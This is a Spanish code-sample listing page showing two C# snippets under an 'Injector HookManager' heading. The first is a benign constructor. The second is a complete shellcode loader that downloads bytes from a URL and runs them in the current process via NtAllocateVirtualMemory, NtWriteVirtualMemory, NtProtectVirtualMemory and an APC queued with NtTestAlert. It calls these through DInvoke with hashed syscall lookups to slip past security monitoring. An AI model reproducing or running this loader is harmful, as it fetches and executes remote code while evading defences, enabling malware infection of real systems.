Ejemplos de Injector HookManager en C# (CSharp)

Ejemplo n.º 1

 public Main(EntryPoint entryPoint)
 {
     this._injectManager          = new InjectManager(entryPoint.ChannelName);
     this._hookManager            = new HookManager(entryPoint);
     this._mirrorSite             = new BloodCatClient();
     this._progressTimer.Elapsed += (sender, args) =>
     {
         _progressTimer.Stop();
         _canSpeak = true;
     };
     _synth = new SpeechSynthesizer()
     {
         Volume = 100
     };
     _synth.SelectVoiceByHints(VoiceGender.Male, VoiceAge.Adult, 0, new CultureInfo("en-us"));
 }

Ejemplo n.º 2

Archivo: Program.cs Proyecto: Kudaes/Scripts

        static void Main(string[] args)
        {
            if (args.Length < 1)
            {
                printHelp();
                return;
            }

            string url = args[0];

            IntPtr hmodule = IntPtr.Zero;

            hm = new HookManager();

            DInvoke.Data.Native.UNICODE_STRING bb = new DInvoke.Data.Native.UNICODE_STRING();
            DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref bb, @"c:\windows\system32\ntdll.dll");
            DInvoke.DynamicInvoke.Native.LdrLoadDll(IntPtr.Zero, 0, ref bb, ref hmodule);

            List <DInvoke.DynamicInvoke.EAT> eat = DInvoke.DynamicInvoke.Generic.GetExportAddressEx(hmodule);
            var dict = DInvoke.DynamicInvoke.EAT.ConvertToDict(eat);

            byte[] sc = new System.Net.WebClient().DownloadData(url);


            IntPtr baseAddr = IntPtr.Zero;
            var    lpValue  = Marshal.AllocHGlobal(IntPtr.Size);

            Marshal.WriteIntPtr(lpValue, new IntPtr((long)sc.Length));


            var id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtAllocateVirtualMemory")];

            object[] allocate = { (IntPtr)(-1),                                                                                                                 baseAddr, IntPtr.Zero, lpValue,
                                  (uint)(DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Commit),
                                  (uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };

            baseAddr = (IntPtr)Syscalls.executeSyscall(id, "NtAllocateVirtualMemory", allocate)[1];

            IntPtr buffer = Marshal.AllocHGlobal(sc.Length);

            Marshal.Copy(sc, 0, buffer, sc.Length);
            uint bytesWritten = 0;

            object[] write = { (IntPtr)(-1), baseAddr, buffer, (uint)sc.Length, bytesWritten };
            id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtWriteVirtualMemory")];
            Syscalls.executeSyscall(id, "NtWriteVirtualMemory", write);


            uint oldProtect = 0;

            object[] protection = { (IntPtr)(-1), baseAddr, lpValue, (uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
            id       = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtProtectVirtualMemory")];
            baseAddr = (IntPtr)Syscalls.executeSyscall(id, "NtProtectVirtualMemory", protection)[1];



            object[] apc = { GetCurrentThread(), baseAddr, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero };
            id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtQueueApcThread")];
            Syscalls.executeSyscall(id, "NtQueueApcThread", apc);

            // hm.Install(); I just wanted to hook GetProcAddress, but this is not usefull for the shellcode injection.


            object[] alert = {};
            id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtTestAlert")];
            Syscalls.executeSyscall(id, "NtTestAlert", alert);
        }